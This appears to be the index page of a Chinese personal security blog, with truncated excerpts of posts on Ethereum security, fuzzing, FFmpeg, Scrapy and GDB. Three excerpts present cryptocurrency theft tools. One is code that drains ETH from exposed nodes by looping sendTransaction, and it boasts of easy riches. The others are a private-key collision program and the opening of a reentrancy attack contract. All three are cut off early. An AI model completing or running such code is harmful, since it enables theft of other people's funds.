地狱怪客

以太坊ETH盗币漏洞代码

大概那些盗币原理也就这样吧~ 循环发送sendTransaction 命令导致对方服务器ETH余额被盗。 守株待兔一个亿不是梦。 #coding:utf-8 import time from web3 import Web3, HTTPProvider import multiprocessing import socket import socks socket.setdefaulttimeou […]

以太坊ETH私钥碰撞代码

学了段时间ETH安全写的私钥碰撞程序 效果有些慢,反正我还没碰撞到。 python不适合,太卡了 #coding:utf-8 import time from web3 import Web3, HTTPProvider from ecdsa import SigningKey, SECP256k1 import sha3 import socks import socket import mul […]

ETH智能合约递归漏洞示例代码

contract Attack{ address owner; address victim; modifier ownerOnly { require(owner == msg.sender); _; } function Attack() payable{ owner = msg.sender; } // 设置已部署的 IDMoney 合约实例地址 function setvictim(add […]

根据私钥算ETH地址

from ecdsa import SigningKey, SECP256k1 import sha3 keccak = sha3.keccak_256() priv = SigningKey.generate(curve=SECP256k1) pub = priv.get_verifying_key().to_string() keccak.update(pub) address = kecca […]

人工智能在漏洞发现中的运用之虚与实

文章来源:https://www.syscan.org/slides/2016_SH_Li_Kang_The_Hype_and_Reality_of_AI_in_Vulnerability_Discovery.pdf 人工智能在漏洞发现中的运用之虚与实 Kang Li kangli.ctf@gmail.com 自我介绍 乔治亚大学教授 Disekt、SecDawgs CTF 团队创始人 xCTF […]

Trend Micro CVE

We have published our Security Bulletin for the vulnerability that you’ve reported on Trend Micro Security driver exploit. Please check this out and let us know if you have concerns: https://esupport. […]

FFMPEG解码学习笔记(一)

文章来源:https://www.cnblogs.com/findman/p/6050580.html FFMPEG的基本处理流程 音频视频同步资料 av_frame_get_pkt_duration(frame) 获取当前帧的持续时间 av_frame_get_pkt_pos(frame) 从最后一个AVPacket进入解码重新排序的偏移量 av_frame_get_best_effort_ti […]

区块链 智能合约 信息安全整理

区块链技术安全讨论 https://paper.seebug.org/511/ 区块链安全 – DAO攻击事件解析 https://paper.seebug.org/544/ 区块链安全 – 以太坊短地址攻击 https://paper.seebug.org/545/ 揭秘以太坊中潜伏多年的“偷渡”漏洞,全球黑客正在疯狂偷币 https://paper.seebug.org […]

设计MacosX的Fuzzer

文章原文:https://blog.csdn.net/fallblood/article/details/5489476   该个人项目起源于与一朋友的打赌事件,于是这段时间在做这方面的研究, 虽然很久之前(大约3年半)也接触过bsd系统,但osx下面的漏洞挖掘一 直没有搞过,也不知道该如何下手,于是花了一周时间搜集整理兼阅读了 很多的资料。   经过分析后确定了几个问题: 1 […]

scrapy爬虫添加cookie

class transCookie: def __init__(self, cookie): self.cookie = cookie def stringToDict(self): ”’ 将从浏览器上Copy来的cookie字符串转化为Scrapy能使用的Dict :return: ”’ itemDict = {} items = self.cookie.split(‘;’) for ite […]

GDB 常用命令总结

原文 https://blog.csdn.net/thisinnocence/article/details/50967548 断点、观察点   运行   调用栈   多线程   attach 进程   打印 自动化脚本